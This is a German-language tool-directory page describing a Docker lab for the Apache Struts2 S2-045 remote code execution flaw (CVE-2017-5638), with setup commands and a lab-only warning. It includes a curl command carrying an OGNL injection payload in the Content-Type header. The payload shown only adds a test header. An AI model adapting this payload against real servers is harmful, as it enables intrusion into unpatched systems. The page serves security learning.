Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
vulhub-struts2 — Ein praktisches Labor, das die Ausnutzung einer kritischen Remote Code Execution (RCE)-Sicherheitslücke in Apache Struts2 (CVE-2017-5638) unter Verwendung von Vulhub Docker-Umgebungen demonstriert. Enthält Einrichtungsanweisungen und Befehle zum Starten des anfälligen Containers. | Kitploit
Tools/GitHubGitHub/soufiane-benchahyd/vulhub-struts2
SchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungLabs & Praxis
GitHubsoufiane-benchahyd/vulhub-struts2

vulhub-struts2

Ein praktisches Labor, das die Ausnutzung einer kritischen Remote Code Execution (RCE)-Sicherheitslücke in Apache Struts2 (CVE-2017-5638) unter Verwendung von Vulhub Docker-Umgebungen demonstriert. Enthält Einrichtungsanweisungen und Befehle zum Starten des anfälligen Containers.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 6 MonatenNoch nicht geprüft

Apache Struts2 S2-045 RCE (CVE-2017-5638)

📌 Überblick

Dieses Projekt demonstriert die Sicherheitslücke zur Remote Code Execution (RCE) in Apache Struts2 (CVE-2017-5638).

Angreifer können einen manipulierten HTTP Content-Type-Header ausnutzen, um auf verwundbaren Servern beliebige Systembefehle auszuführen.

Dieses Repository verwendet Vulhub Docker Labs, um eine sichere Umgebung zum Testen und Verstehen der Sicherheitslücke bereitzustellen.


🛠 Einrichtung der Umgebung

  • Host: Ubuntu 24.04 (VirtualBox oder nativ)
  • Docker & Docker Compose
  • Vulhub Lab
  • Apache Struts2 Version: 2.3.30

🚀 Erste Schritte

1️⃣ Dieses Repository klonen

root@kitploit:~
git clone https://github.com/soufiane-benchahyd/vulhub-struts2.git
cd vulhub-struts2/struts2/s2-045

2️⃣ Den angreifbaren Container starten

root@kitploit:~
docker compose up -d

3️⃣ Überprüfen, ob der Container läuft

root@kitploit:~
docker ps

Sie sollten etwa Folgendes sehen:

root@kitploit:~
CONTAINER ID   IMAGE                   COMMAND                  STATUS      PORTS
xxxxxxx        vulhub/struts2:2.3.30   "/usr/local/bin/mvn-…"   Up          0.0.0.0:8080->8080/tcp

4️⃣ Die Weboberfläche testen

Öffnen Sie Ihren Browser → http://<VM_IP>:8080 Sie sollten die Startseite der Struts2-Anwendung sehen.

VM‑IP-Beispiel: 192.168.56.101


💻 Ausnutzung

⚠️ Führen Sie die Ausnutzung nur in einer kontrollierten Laborumgebung durch. Greifen Sie niemals öffentliche Server an.

Sie können nun die RCE mit Skripten oder Tools wie curl oder Metasploit gegen den angreifbaren Container testen.

Beispiel (ersetzen Sie <command> durch Ihren Testbefehl):

root@kitploit:~
curl -v -H "Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','test')}" http://<VM_IP>:8080/

📝 Hinweise

  • Dieses Labor ist sicher: Alle Aktionen finden innerhalb von Docker statt.
  • Screenshots Ihres Tests können später zu GitHub hinzugefügt werden.
  • Sie können dieses Repository mit anderen Struts2-Sicherheitslücken erweitern, um ein vollständiges Lernportfolio zu erstellen.

⚡ Referenzen

  • Apache Struts2 S2-045 CVE
  • Vulhub GitHub
Tool herunterladen